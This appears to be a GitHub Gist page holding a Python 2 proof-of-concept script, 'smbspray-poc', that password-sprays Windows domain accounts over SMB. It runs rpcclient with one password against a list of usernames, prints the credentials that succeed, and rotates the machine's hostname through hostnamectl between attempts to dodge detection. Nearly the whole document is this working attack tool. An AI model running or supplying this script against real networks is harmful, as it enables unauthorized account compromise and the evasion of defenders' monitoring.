Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import getopt, sys, subprocess
def help():
print """
Usage: smbspray-poc [options]"
\t-l: user list to password spray
\t-c: hostnames to rotate through for each request
\t-p: password
\t-d: domain
\t-t: target server
"""
try:
opts, args = getopt.getopt(sys.argv[1:], "l:c:p:d:t:")
except getopt.GetoptError:
help()
print len(opts)
if len(opts) < 5 or len(opts) > 6:
help()
sys.exit()
for opt, arg in opts:
if opt == "-h":
help()
sys.exit()
elif opt == "-l":
userlist = arg
elif opt == "-c":
clientlist = arg
elif opt == "-p":
password = arg
elif opt == "-d":
domain = arg
elif opt == "-t":
target = arg
#Read username list to spray against
with open(userlist) as f:
usernames = f.readlines()
usernamesstripped = [x.strip() for x in usernames]
#Read hostnames to be used to send to the server.
with open(clientlist) as g:
hostnames = g.readlines()
hostnamesstripped = [x.strip() for x in hostnames]
#Get original hostname to change back to after running
p = subprocess.Popen('hostname', shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in p.stdout.readlines():
orighostname = line.strip()
#These are the error messages from rpcclient output to determine success or failure
logonFailed ="NT_STATUS_LOGON_FAILURE"
logonSuccess ="Account Name"
total_accounts = len(usernamesstripped)
print "Total number of users: " + str(total_accounts)
print "Password spraying has now started... please sit tight."
#k = hostname index
k = 0
#l = maximun index for the hostnames
l = len(hostnamesstripped) - 1
#Now using rpcclient to spray accounts
for i in range(total_accounts):
subprocess.call("hostnamectl set-hostname '%s'" % hostnamesstripped[k], shell=True)
proc = subprocess.Popen("rpcclient -U \"%s\\%s%s%s\" -c \"getusername;quit\" %s" %(domain, usernamesstripped[i],"%", password, target), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
output = proc.stdout.read()
if logonSuccess in output:
print "[+] " +usernamesstripped[i] + ":" +password
if k < l:
k +=1
else:
k = 0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.